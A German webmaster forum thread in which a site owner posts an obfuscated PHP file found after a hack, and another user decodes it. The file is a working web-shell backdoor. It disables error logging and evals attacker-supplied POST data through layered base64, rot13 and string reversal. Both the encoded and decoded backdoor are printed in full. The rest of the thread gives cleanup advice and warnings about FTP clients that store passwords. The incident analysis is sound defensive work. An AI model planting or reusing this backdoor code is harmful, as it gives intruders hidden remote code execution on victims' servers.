Server gehackt Frage zu Skript

[Stephs]

Hallo zusammen,

da eine von meinen Seite gehackt wurde konnte jemand Skripte per FTP hochladen. Nun möchte ich gern wissen was das für Skripte sind. Ich habe nur eine PHP Datei gefunden die aber leider codiert ist.

Kann man das decodieren?

Code: PHP  [Auswählen]

<?php eval(gzinflate(base64_decode("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")));

?>

Hat da jemand einen Plan von?!

Linkback: https://www.modified-shop.org/forum/index.php?topic=23489.0

[Gradler]

Da würde ich an Deiner Stelle lieber schnell mal nachschauen, ob der Code auch auf Deinen anderen Seiten zu finden ist. Wenn der FTP Zugang auch Zugangsdaten zu diesen Seiten gespeichert hat wird das wohl auch der Fall sein.

Sag aber ejtzt bloß nicht Du verwendest FileZilla

Gerd

[Stephs]

Nee alle anderen Seiten sind ok. Ich denke ich weiß wer das war, denn da gab es etwas Ärger mit dem übernehmen einer Seite.
Ich habe die Infos was geändert wurde aus dem FTP-Log.

[Webi]

Hallo,
ist zwar net gerade das Thema darum sei es mir mal verziehen

Sag aber ejtzt bloß nicht Du verwendest FileZilla

was ist daran schlecht ?

[alca]

Über folgende Seite (http://www.base64decode.org/ ) kann man Base64-Codierten Code decoden.
Der Code wird nicht ausgeführt, man bekommt den Code nur angezeigt.

Gruss
alca

[Gradler]

das ejtzt?

Lies mal, wer gehackt wurde und woran es oft lag. FileZilla und gespeicherte Passwörter.

[Stephs]

Über folgende Seite (http://www.base64decode.org/ ) kann man Base64-Codierten Code decoden.
Der Code wird nicht ausgeführt, man bekommt den Code nur angezeigt.

Gruss
alca

Danke dir, leider berücksichtigt die Seite das gezippte nicht und so kommt auch nur "Quark" bei raus.

[h-h-h]

Habe den Code kurzerhand mal "entschlüsselt".

Code: PHP  [Auswählen]

@error_reporting(0);
@ini_set("display_errors",0);
@ini_set("log_errors",0);
@ini_set("error_log",0);

if (isset($_GET['r'])) {
    print $_GET['r'];
} elseif (isset($_POST['e'])) {
    eval(base64_decode(str_rot13(strrev(base64_decode(str_rot13($_POST['e']))))));
} exit;

War schon drauf und dran dafür ein kleines Programm zur Entschlüsselung zu schreiben. Funktionierte mit ein paar Zeilen Code aber auch schon ohne Probleme.

Dies Script ermöglicht es dem Angreifen mit der Information über das Script eigenen Code einzuschleusen bzw. auszuführen.

Daher ist dein Webspace/Server/DB meiner Meinung nach kompromitiert und sollte komplett gecheckt werden.

Freundlichen Gruß

h-h-h

[Stephs]

Ich danke dir vielmals. Du warst mir eine sehr große Hilfe.

Ich habe es mir schon fast gedacht. Ich habe zum Glück nur wenige Minuten später schon gesehen, dass da jemand drin war, der da nix zu suchen hat. Aber nur durch nen Mega Zufall.

Ich habe als erstes die Daten gesichert um die "Analyse" zu machen, was geändert wurde und dann sofort die letzte Datensicherung eingespielt. Anschliessend habe ich FTP, USER & MYSQL Benutzernamen und Passwörter geändert. Nun muss ich noch die Lücke suchen, aber ich denke ich habe auch diese schon gefunden.

Noch ne Idee, was ich prüfen sollte?

[h-h-h]

Es ist nicht gesagt, dass die "Backdoor" ausgenutzt wurde. Der genaue Schaden kann daher nicht genau, ohne weitere Informationen der Server-Einstellungen und dessen Logs vom Forensupport übernommen werden.

Freundlichen Gruß

h-h-h

[Stephs]

Ich habe gerade noch den Server selbst noch durchgeschaut und die Daten noch angepasst, wo ich denke das sie mal wieder geändert werden sollten.
Zwei kleine Updates habe ich auch nochmal gezogen. Also ich denke das passt nun wieder.

Ich möchte euch nicht mehr Arbeit machen als nötig. Ich danke euch für den Support.